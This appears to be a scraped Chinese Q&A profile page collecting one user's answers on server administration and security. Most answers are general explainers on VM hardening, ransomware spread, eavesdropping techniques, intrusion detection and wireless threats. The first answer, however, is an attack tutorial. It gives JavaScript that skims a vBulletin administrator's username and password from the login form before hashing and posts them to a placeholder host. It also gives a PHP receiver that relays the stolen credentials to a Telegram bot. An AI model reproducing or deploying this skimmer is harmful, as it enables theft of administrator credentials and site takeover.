<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    Andrew 的所有回復(735)

    評論于 2年前,獲得 0 個贊

    通過數據庫中的加密密碼來更改管理加密密碼以訪問管理面板,但您可能很快就會離開服務器。

    但是有一個更好的解決方案,可以通過網絡釣魚攻擊或使用JavaScript竊取密碼來獲取管理員純文本密碼,我將在本主題中進行介紹。

    我們可以使用PHP并在發布請求后獲取密碼,但是vBulletin會在客戶端使用JavaScript使用MD5加密密碼,因此我們將嘗試在密碼加密之前獲取密碼。

    我將使用的腳本是:

    function mal()
    {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://example/admindata.php", true);
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
        xhr.send("Data="+document.getElementById("vb_login_username").value + " " + document.getElementById("vb_login_password").value);
    }

    給定的腳本獲取密碼并將其發送到PHP腳本,然后將其寫入文件或使用電報或電子郵件將其發送給您(使用電報API的示例):

    <?php
    
    if ($_SERVER['REQUEST_METHOD'] == "POST" && isset($_POST['Data']))
    {
    $token = "YOUR_TOKEN";
    file_get_contents("https://api.telegram.org/bot$token/sendMessage? 
    chat_id=YOUR_CHAT_ID&text=" . urlencode($_POST['Data'])."" );
    }
    else
        header("Location: https://google.com");
    ?>

    因此,現在您可以將PHP腳本上傳到同一臺服務器或同一臺服務器上,或者可以直接從JavaScript發送密碼。

    評論于 1年前,獲得 0 個贊

    第一,安裝 vsftpd

    必須使用匿名帳戶,即vsftpd需要開啟匿名用戶。

    匿名用戶的目錄默認使用的是 /var/ftp,大家可以根據自己的需要進行修改。

    第二,掛載ISO鏡像

    假設ISO鏡像的保存路徑是 /home/iso/rhel/rhel-server-6.1-x86_64-dvd.iso

    將ISO鏡像掛在到 /var/ftp/rpmforge/rhel/6.1/x86_64

    mount -o loop /home/iso/rhel/rhel-server-6.1-x86_64-dvd.iso /var/ftp/rpmforge/rhel/6.1/x86_64

    評論于 11個月前,獲得 0 個贊

    加強虛擬服務器安全的方法有:

    • 選擇具有可信平臺模塊(TPM)的物理服務器。TPM可以在虛擬服務器啟動時檢測用戶密碼,并依據檢測結果決定是否啟動此虛擬服務器。如果有可能,應使用新的帶有多核處理器,并支持虛擬技術的CPU,這樣就能保證CPU之間的物理隔離,減少部分安全問題。

    • 每臺虛擬服務器應通過虛擬局域網(VLAN)和不同IP地址網段的方式進行邏輯隔離。需要通信的虛擬服務器間通過VPN進行網絡連接。

    • 安裝虛擬服務器時,應為每臺虛擬服務器分配一個獨立的硬盤分區,以便進行邏輯隔離。虛擬服務器系統還應安裝基于主機的防火墻、殺毒軟件、日志記錄和恢復軟件,以便將它們相互隔離,并與其他安全防范措施一起構成多層次防范體系。

    • 在防火墻中,盡量對每臺虛擬服務器做相應的安全設置,進一步對它們進行保護和隔離,將服務器的安全策略加入系統的安全策略中,并按物理服務器安全策略的方式來對等。

    • 對于虛擬服務器系統,應當像對一臺物理服務器一樣地對它進行系統安全加固。同時嚴格控制物理主機上運行虛擬服務的數量,禁止在物理主機上運行其他網絡服務。因為一旦物理主機受到侵害,所有在其中運行的虛擬服務器都將面臨安全威脅,或者直接停止運行。

    • 避免服務器過載崩潰,要不斷監視服務器的硬件利用率,并進行容量分析,使用容錯服務器或容錯軟件是一個好的選擇。

    • 對虛擬服務器的運行狀態進行嚴密監控,實時監控各虛擬機當中的系統日志和防火墻日志,以此來發現存在的安全隱患,對不需要運行的虛擬機應當立即關閉。

    評論于 8個月前,獲得 0 個贊

    數據驅動的身份大數據有以下方面的功能:

    • 終端環境感知:通過在終端安裝的插件對終端環境、運行狀態、風險行為進行持續采集和分析,從而對終端健康度進行評估,將其作為持續信任評估的輸入。

    • 持續信任評估:根據身份、權限、終端環境感知、訪問日志等信息進行綜合分析,采用大數據分析和人工智能技術,對發起訪問請求的人員和終端進行綜合評估,計算信任等級,以支撐動態訪問控制平臺實現動態權限的調整。

    • 風險策略編排:匯聚來自外部威脅檢測平臺等的風險事件輸入,基于策略進行編排并在策略評估滿足時,對動態訪問控制平臺、身份基礎設施及其他聯動的安全產品下發控制指令。

    • 身份可視化:基于身份大數據進行分析并以可視化的方式呈現,可對全平臺的身份、權限、訪問、風險信息進行直觀展現。

    • 身份大數據管理:將與身份相關的數據進行集中化的管理和維護,包括地區、使用行為、應用資源等,并基于大數據技術自動化分析與身份相關的數據。可分析用戶的地域分布,提供區域熱點及城市熱點分析;分析用戶系統環境、應用訪問流量、認證偏好、訪客屬性及用戶活躍度、訪問頻次和訪問時長等有價值的信息,協助用戶進行持續的風險信任評估。

    • 行為分析:基于全網訪問行為進行基于身份的關聯并構建訪問行為基線,對偏離基線的行為進行告警;通過風險策略編排,最后影響訪問者的信任等級。

    • 賬號分析:對身份基礎設施的身份庫信息進行分析,發現孤兒賬號、僵尸賬號等異常數據;通過與身份基礎設施之間的聯動,可自動對異常賬號數據進行凍結或刪除。

    • 權限分析:基于對等組分析等模型,對身份基礎設施的權限庫進行挖掘分析,若發現不符合最小權限的原則,或違背職責分離原則的權限,則進行自動調整。

    評論于 3個月前,獲得 0 個贊

    勒索軟件入侵計算機的方式有以下這些:

    • 特洛伊木馬和其他惡意軟件:大多數這類感染都是通過特洛伊木馬傳播的。Trojan.Lockscreen是在系統上安裝勒索軟件的最常用威脅。他們在用戶不知情的情況下進入系統,因為他們往往會到達電子郵件消息的附件中,這些電子郵件消息以信譽良好的各方(如Amazon、eBay、金融機構等)的消息的形式出現。一旦用戶被騙下載此類附件,攜帶勒索軟件有效負載的特洛伊木馬就會被激活。

    • 假彈出通知:這類惡意軟件的一些樣本是通過在非法或合法網站上可以看到的假彈出通知來傳播的。大多數情況下,它們會報告更新丟失的情況,但它們也可以“通知”您需要免費掃描系統并清除病毒。這些廣告通常以不可疑的名字和合法的商標歸檔,所以它們可以欺騙最有經驗的電腦用戶點擊它們。

    • 垃圾郵件:這是最有利可圖的技術在勒索軟件分發。具有諷刺意味的是,如果用戶更加謹慎,他們可以防止劫持最具破壞性的威脅。該技術的關鍵原理在于將惡意軟件包裝成.doc或.js文件。臭名昭著的加密惡意軟件Locky尤其擅長使用這種技術。

    • 通過強調假發票或包裹遞送附件的重要性,說服受害者提取所附文件:如果它是.doc文件,它可能會要求用戶啟用宏設置。如果它們被啟用,被破壞的文件下載惡意軟件的主要有效載荷。另外,網絡犯罪分子偽造了傳票或據稱由聯邦調查局發送的電子郵件。用戶應該注意這類郵件的內容。它們通常包含語法錯誤和打字錯誤,以及修改過的憑證。

    • 利用工具:這種技術通常是那些面臨更復雜威脅的開發人員的首選。Locky和Cerber病毒作者特別熱衷于使用Angler、RIG和中微子開發工具包。而前者,釣魚者,幸運地被終止,鉆井和中微子繼續促進傳輸特性的加密惡意軟件。他們的主要工作原則是在選定的領域妥協。通過注入被破壞的腳本,訪問這些域名的用戶最終會被這些威脅所攻擊。因此,防止此類網絡攻擊的唯一可行方法仍然是使用網絡安全工具。

    • 軟件漏洞和盜版程序:網絡罪犯用勒索軟件感染用戶最簡單的方法就是讓用戶自己安裝。有數百萬的用戶訪問torrent, warez,和類似的網站,允許他們下載盜版應用程序或破解,這不是一個秘密。Keygens, crack,或loaders的設計目的是繞過合法程序的許可程序,獲得完全訪問權限或免費使用的高級功能。

    • 有無數的網站散布裂縫:雖然安全軟件會立即警告感染的危險,但用戶往往會忽略這些消息,繼續打開惡意的可執行文件。被稱為Djvu的勒索軟件是最成功的勒索軟件之一,多年來一直在使用這種策略,成為最多產的針對家庭用戶的加密惡意軟件。

    • 瀏覽器擴展:這是一種相對較新的技術,主要由Spora勒索軟件開發者使用。他們還依賴于EiTest腳本技術,這種技術會通過注入特定的腳本而破壞某個web頁面。網民訪問該域名后,內容會被轉換為一組無法讀取的數字和字符,并會出現“HoeflerText字體未找到”的通知。

    評論于 2年前,獲得 0 個贊

    兩者都可以在域控制器上利用系統管理員身份登錄后設置域安全策略,域安全策略管理屬于該域內的所有計算機但是域控制器是管理單位內所有的域控制器而不是計算機,域安全策略是優先于計算機策略但低于域控制器安全策略的,當域安全策略改變時要應用到計算機才有效而域控制器安全策略不受影響。

    1. 域安全策略:
    • 可以在域控制器上利用系統管理員身份登錄后設置域安全策略,具體設置方式與本地安全策略的設置相同。

    • 隸屬于域的任何一臺計算機,都會受到域安全策略的影響。

    • 隸屬于域的計算機,如果其本地安全策略設置與域安全策略設置發生沖突,則以域安全策略設置優先,本地設置自動失效。

    • 當域安全策略的設置發生了變化,這些策略必須應用到本地計算機后才能對本地計算機有效。

    1. 域控制器安全策略:
    • 可以在域控制器上利用系統管理員身份登錄后設置域控制器安全策略,其設置方法與域安全策略和本地安全策略相同。

    • 任何一臺位于組織單位域控制器內的域控制器,都會受到域控制器安全策略的影響。

    • 域控制器安全策略的設置必須要應用到域控制器后,這些設置對域控制器才起作用。域控制器安全策略與域安全策略的設置發生沖突時,對于域控制器容器內的計算機來說,默認以域控制器安全策略的設置優先,域安全策略自動失效。

    • 域安全策略中的賬戶策略設置對域內所有的用戶都有效,即使用戶賬戶位于組織單位域控制器內也有效,也就是說,域控制器安全策略中的賬戶策略對域控制器并不起作用。

    評論于 1年前,獲得 0 個贊

    服務器打補丁時需要注意以下方面:

    • 機器在沒有安裝補丁之前切記不要聯網。所需的補丁程序在其他計算機下載后,使用其移動存儲設備或者刻錄成光盤,復制到需要安裝補丁的服務器。

    • 某些補丁程序對安裝順序有要求,否則無法完成安裝或導致安裝失敗。

    • 開始安裝補丁程序前應首先關閉其他應用程序,以免導致安裝失敗。另外,有些補丁程序安裝完成后需要重新啟動服務器方可生效,打開的應用程序應注意及時保存當前的結果。

    • 獲取補丁程序時應注意其版本要求,不僅要注意操作系統的類型,還應注意英文版和簡體中文版、繁體中文版的區別。

    • 安裝過程中如需確認或更改安裝目錄的,建議保持系統默認設置。

    評論于 11個月前,獲得 0 個贊

    常見的網絡竊聽的手段如下:

    • 電話竊聽:竊聽電話用得比較多的是落入式電話竊聽器。這種竊聽器可以當作標準送話器使用,用戶察覺不出任何異常。它的電源取自電話線,并以電話線作天線,當用戶拿起話機通話時,它就將通話內容用無線電波傳輸給在幾百米外竊聽的接收機。這種竊聽器安裝非常方便,從取下正常的送話器到換上竊聽器,只要幾十秒鐘時間。可以以檢修電話為名,潛入用戶室內安上或卸下這種竊聽器。

    • 無線竊聽:隨著大規模集成電路和微電子技術的發展,無線竊聽技術水平得到空前的提高。首先,竊聽器體積的微型化程度越來越高。有的無線竊聽器僅一米粒大小,偽裝起來也更加巧妙,竊聽器可以隱藏在鋼筆、手表、打火機、鞋跟中,甚至人的器官也成了無線竊聽器材的安裝場所。其次,竊聽器的自我保護功能也大大加強了。檔次高的無線竊聽器大多有遙控功能,當發現有人檢查竊聽器時,可以讓竊聽器停止工作。有的竊聽器還采取了加密措施,加密后的無線電信號,一旦被搜索到也只是一片雜音或交流聲,難以判斷是否是無線竊聽器發出的信號。有的還把無線竊聽器做成“槍彈”,用特制的槍械射到目標住所的窗框上或墻壁上,竊聽器有吸附裝置,可以牢固地吸附在物體上,既隱蔽安裝也很方便,不易被人察覺。

    • 微波竊聽:有些物體如玻璃、空心鋼管等制成一定形狀后,既能對說話的聲波有良好的震動效果,又能對微波有良好的反射效應。巧妙地將這種物體放在目標房內,在一定距離向它們發射微波,這些物體反射回來的微波中就會包含有房內說話音的成分,用微波接收機接收并解調后,就能獲得目標在房內講話的內容。

    • 激光竊聽:當房間內有人談話時,窗子的玻璃會隨聲波發生輕微震動,而同時玻璃又能對激光有一定反射,聲波在反射回來的激光中反應出來,經過激光接收器的接收,再經過解調放大,就能將室內的談話聲音錄制下來。這種竊聽器最大優點是不需要到目標房內安裝任何東西,作用距離可達300-500米。在海灣戰爭中,美國人就曾使用了激光竊聽技術,從行駛中的伊拉克高級將領座車的反光鏡上,竊聽了車內的談話。

    • 數據竊聽:隨著各國政府機關、保密要害部門、企事業單位配備的電子打字機、電傳機、傳真機、計算機等辦公自動化設備越來越多,在這些設備內安裝數據竊聽器也成為熱門,從中可以竊取大量的電報、文件數據、圖象等未加密的原始信息。這迫使各國都規定了進入本國涉密單位的辦公自動化設備,必須進行保密安全檢查。

    • 定向麥克風竊聽器:定向麥克風竊聽器是一種有高靈敏度的強方向性的麥克風,同時還采用了高功率、低噪音的放大器,可有效地抑制其它方向的干擾,突出來自目標的聲音,所以能竊聽到遠在幾十米至幾百米開外的兩個人對話的內容,在夜深人靜的時候竊聽距離可能增加到幾公里。過去人們普遍認為,出國期間在賓館、駐地商談秘密事項容易被人竊聽,需要到湖濱、公園去商談。現在看來湖濱、公園也不是安全之地了,需要到鼓樂齊鳴的劇場和人聲鼎沸的商場去商談秘密事項,否則就難以逃脫被竊聽的厄運。

    • 隔墻有“耳”竊聽器:隔墻有“耳”竊聽器,是一個高靈敏度的音頻放大器,它安裝在一個房間的外墻側,即使墻體是一米厚的水泥墻也可以清晰地收聽到房間內的談話內容。

    網絡竊聽常用的防范方法如下:

    • 加密:首先,加密電子郵件、網絡和通信,使用靜態或動態數據。這樣、即使數據被截獲,不法分子也無法在沒有加密密鑰的情況下對其進行解密。對于無線加密,建議使用Wi-Fi Protected Access 2或WPA3。所有基于Web的通信都應使用 HTTPS。但是請注意,雖然大多數數據都可以加密,但仍可以通過嗅探器收集網絡流量元數據,例如端點和IP地址。

    • 驗證:對傳入數據包進行身份驗證是防止暴露出真實ip地址或MAC地址被抓包。使用提供身份驗證的標準和協議。大多數加密協議,例如TLS、安全/多用途Internet郵件擴展、OpenPGP和IPsec,都包含某種形式的身份驗證。

    • 網絡監控:安全團隊應該通過滲透檢測系統或端口是否存在異常網絡活動。安全團隊還應該使用惡意行為者用來檢測網絡漏洞的相同嗅探器程序。

    • 提高安全意識:讓大家了解竊聽風險以及防范此類竊聽的方法。由于許多竊聽都涉及惡意軟件,因此建議大家不要單擊鏈接或下載不熟悉的文件。不定的修改賬號密碼可以防止攻擊者通過泄露的憑據獲得訪問權限。此外,告訴大家避免使用公共Wi-Fi網絡。

    • 網絡分段:對網絡進行分段可以使某些數據遠離黑客。比如,將關鍵基礎設施與財務以及人力資源程序服務器分開,并將它們全部與訪客網絡分開。如果一個段被破壞,黑客將無法訪問其他段。

    • 安全技術:防火墻、VPN和反惡意軟件對于阻止竊聽攻擊至關重要。使用數據包過濾,配置路由器和防火墻以拒絕任何帶有欺騙地址的數據包。

    評論于 4個月前,獲得 0 個贊

    數據安全技術包括以下五種技術:

    • 用戶標識和鑒別技術:該方法由系統提供一定的方式讓用戶標識自己的名字或身份。每次用戶要求進入系統時,由系統進行核對,通過鑒定后才提供系統的使用權。

    • 存取控制技術:通過用戶權限定義和合法權檢查確保只有合法權限的用戶訪問數據庫,所有未被授權的人員無法存取數據。例如C2級中的自主存取控制(I)AC),Bl級中的強制存取控制(M.AC)。

    • 視圖機制技術:為不同的用戶定義視圖,通過視圖機制把要保密的數據對無權存取的用戶隱藏起來,從而自動地對數據提供一定程度的安全保護。

    • 審計技術:建立審計日志,把用戶對數據庫的所有操作自動記錄下來放人審計日志中,DBA可以利用審計跟蹤的信息,重現導致數據庫現有狀況的一系列事件,找出非法存取數據的人、時間和內容等。

    • 數據加密技術:對存儲和傳輸的數據進行加密處理,從而使得不知道解密算法的人無法獲知數據的內容。

    評論于 1年前,獲得 0 個贊

    解決大數據安全威脅的防護措施有以下這些:

    • 完善移動大數據平臺安全機制:可以借助市面上的商業化移動大數據平臺來進行管理,目前市面上商業化移動大數據平臺已經具備了相對完善的安全機制。在集中安全管理和審計方面,實現了集中的系統運維、安全策略管理和審計,通過統一的配置管理界面,解決了安全策略配置和管理繁雜的難題。在身份認證方面,通過邊界防護保障了Hadoop集群入口的安全,通過集中身份管理和單點登錄等方式簡化了認證機制,通過界面化的配置管理方式可以方便地管理和啟用。

    • 對大數據中存儲的數據進行分類:對移動大數據平臺中存儲、傳輸和處理的數據信息,按其風險度進行分類,并在此基礎上對不同類的數據信息按照適度保護和剩余風險可接受原則,實行不同等級的安全防護。這樣既可以解決大規模復雜系統難以實現整體高級別保護的問題,又可以通過適當的投入使需要重點保護的數據信息得到應有的安全防護。

    • 對移動終端軟件加強防護:為了應對移動應用軟件所面臨的安全威脅,需要制定具體的安全防護策略,可以通過安全檢測、安全加固和安全監測3個方面來進行具體落實。目前,應用軟件的安全檢測技術主要包括靜態檢測、動態檢測、漏洞掃描和人工滲透分析。此外,應用軟件安全加固技術還可以從技術層面對系統文件和資源文件等提供保護。

    • 加強移動網絡防護:提前對安全問題進行深入研究并制定相關的安全措施,特別是針對引入的新技術,需要進一步完善移動互聯網的安全機制和風險管控,做好安全風險評估、安全監測和安全維護管理。

    • 著重保護數據:數據是信息系統的核心資產,是移動大數據安全的最終保護對象。設置分級分類的動態防護策略,降低已知的安全風險并減少對業務數據流動的干擾。對于結構化數據的安全措施,主要采用數據庫審計、數據庫防火墻以及數據庫脫敏等數據庫安全防護技術;對于非結構化數據的安全措施,主要采用數據泄露防護技術。同時,細粒度的數據行為審計與追蹤溯源技術,能幫助系統在發生數據安全事件時,迅速定位問題,查漏補缺。

    • 加強對個人隱私的管理:在移動互聯網時代,個人隱私如果得不到有效的保護,輕則造成個人信息泄露和經濟損失,重則會威脅國家安全。所以,需要對隱私的理論和保護體系進行針對性的研究,需要對隱私感知、隱私保護、隱私分析等過程中的隱私進行定量化描述,并構建針對隱私度量演化的公理化描述體系。

    • 做好移動大數據安全審計:對移動大數據平臺的各類訪問記錄、操作行為進行監控,再對這些行為進行審計,分析出系統中是否存在違規訪問行為,最后再通過溯源技術,對該違規訪問進行追溯,以達到在后臺對移動大數據進行安全防護的目的,即實現對移動大數據的安全審計和溯源。

    評論于 8個月前,獲得 0 個贊

    企業尚未深刻認識到工業數據安全的重要性體現在以下三個方面:

    • 對工業數據的價值認識不足,沒有深刻認識到工業數據的生產要素屬性和資產屬性,未意識到保護工業數據就是保護企業投資收益,而工業數據的破壞和損毀將直接導致企業生產遭受破壞。

    • 對工業數據管理的重要意義缺乏理解,大多數工業企業不重視對自身工業數據的梳理,不關注對采集、傳輸、存儲、分析等關鍵環節的工業數據資產的全面掌握,甚至仍在使用基于文檔記錄的初級管理模式。

    • 對工業數據管理措施的落地執行不夠重視,即使已經意識到工業數據管理會帶來價值,但缺乏對行之有效的管理手段、管理方式、管理措施的研究探索與切實執行。

    評論于 4個月前,獲得 0 個贊

    web漏洞掃描的作用如下:

    • 定期的網絡安全自我檢測、評估:配備漏洞掃描系統,網絡管理人員可以定期的進行網絡安全檢測服務,安全檢測可幫助客戶最大可能的消除安全隱患,盡可能早地發現安全漏洞并進行修補,有效的利用已有系統,優化資源,提高網絡的運行效率。

    • 安裝新軟件、啟動新服務后的檢查:由于漏洞和安全隱患的形式多種多樣,安裝新軟件和啟動新服務都有可能使原來隱藏的漏洞暴露出來,因此進行這些操作之后應該重新掃描系統,才能使安全得到保障。

    • 網絡建設和網絡改造前后的安全規劃評估和成效檢驗:網絡建設者必須建立整體安全規劃,以統領全局,高屋建瓴。在可以容忍的風險級別和可以接受的成本之間,取得恰當的平衡,在多種多樣的安全產品和技術之間做出取舍。配備網絡漏洞掃描 / 網絡評估系統可以讓您很方便的進行安全規劃評估和成效檢驗。

    • 網絡承擔重要任務前的安全性測試:網絡承擔重要任務前應該多采取主動防止出現事故的安全措施,從技術上和管理上加強對網絡安全和信息安全的重視,形成立體防護,由被動修補變成主動的防范,最終把出現事故的概率降到最低。配備網絡漏洞掃描 / 網絡評估系統可以讓您很方便的進行安全性測試。

    • 網絡安全事故后的分析調查:網絡安全事故后可以通過網絡漏洞掃描 / 網絡評估系統分析確定網絡被攻擊的漏洞所在,幫助彌補漏洞,盡可能多得提供資料方便調查攻擊的來源。

    • 重大網絡安全事件前的準備:重大網絡安全事件前網絡漏洞掃描 / 網絡評估系統能夠幫助用戶及時的找出網絡中存在的隱患和漏洞,幫助用戶及時的彌補漏洞。

    • 公安、保密部門組織的安全性檢查:互聯網的安全主要分為網絡運行安全和信息安全兩部分。網絡運行的安全主要包括以 ChinaNet、ChinaGBN、CNCnet 等 10 大計算機信息系統的運行安全和其它專網的運行安全;信息安全包括接入 Internet 的計算機、服務器、工作站等用來進行采集、加工、存儲、傳輸、檢索處理的人機系統的安全。網絡漏洞掃描 / 網絡評估系統能夠積極的配合公安、保密部門組織的安全性檢查。

    評論于 3個月前,獲得 0 個贊

    基于誤用檢測原理的入侵檢測方法有以下三種:

    • 基于主機:一般主要使用操作系統的審計、跟蹤日志作為數據源,某些也會主動與主機系統進行交互以獲得不存在于系統日志中的信息以檢測入侵。這種類型的檢測系統不需要額外的硬件,對網絡流量不敏感,效率高,能準確定位入侵并及時進行反應,但是占用主機資源,依賴于主機的可靠性,所能檢測的攻擊類型受限。不能檢測網絡攻擊。

    • 基于網絡:通過被動地監聽網絡上傳輸的原始流量,對獲取的網絡數據進行處理,從中提取有用的信息,再通過與已知攻擊特征相匹配或與正常網絡行為原型相比較來識別攻擊事件。此類檢測系統不依賴操作系統作為檢測資源,可應用于不同的操作系統平臺;配置簡單,不需要任何特殊的審計和登錄機制;可檢測協議攻擊、特定環境的攻擊等多種攻擊。但它只能監視經過本網段的活動,無法得到主機系統的實時狀態,精確度較差。大部分入侵檢測工具都是基于網絡的入侵檢測系統。

    • 分布式:這種入侵檢測系統一般為分布式結構,由多個部件組成,在關鍵主機上采用主機入侵檢測,在網絡關鍵節點上采用網絡入侵檢測,同時分析來自主機系統的審計日志和來自網絡的數據流,判斷被保護系統是否受到攻擊。

    評論于 1年前,獲得 0 個贊
    • 三層路由網關模式

    防火墻作為三層路由網關接入網絡,可以在替代網絡中原有路由器的同時,保障網絡安全。

    圖片

    • 二層透明網橋模式

    防火墻作為二層透明網橋接入網絡,不改變原有網絡結構,且可以與路由模式共存。

    圖片

    評論于 1年前,獲得 0 個贊
    • 信息重放:在沒有足夠的安全防范措施的情況下,是很容易受到利用非法AP進行的中間人欺騙攻擊。對于這種攻擊行為即使采用了VPN 等保護措施也難以避免。中間人攻擊則對授權客戶端和AP 進行雙重欺騙,進而對信息進行竊取和篡改。

    • WEP 破解:現在互聯網上已經很普遍的存在著一些非法程序,能夠捕捉位于AP 信號覆蓋區域內的數據包,收集到足夠的WEP 弱密鑰加密的包并進行分析以恢復WEP密鑰。根據監聽無線通信的機器速度、WLAN 內發射信號的無線主機數量,最快可以在兩個小時內攻破WEP密鑰。

    • 網絡竊聽:一般說來大多數網絡通信都是以明文格式出現的,這就會使處于無線信號覆蓋范圍之內的攻擊者可以乘機監視并破解通信。由于入侵者無需將竊聽或分析設備物理地接入被竊聽的網絡,所以這種威脅已經成為無線局域網面臨的最大問題之一。

    • 假冒攻擊:某個實體假裝成另外一個實體訪問無線網絡,即所謂的假冒攻擊。這是侵入某個安全防線的最為通用的方法。在無線網絡中移動站與網絡控制中心及其它移動站之間不存在任何固定的物理鏈接,移動站必須通過無線信道傳輸其身份信息,身份信息在無線信道中傳輸時可能被竊聽,當攻擊者截獲一合法用戶的身份信息時,可利用該用戶的身份侵入網絡。

    1919 聲望
    文章
    577
    粉絲
    10
    喜歡
    6
    亚洲 欧美 自拍 唯美 另类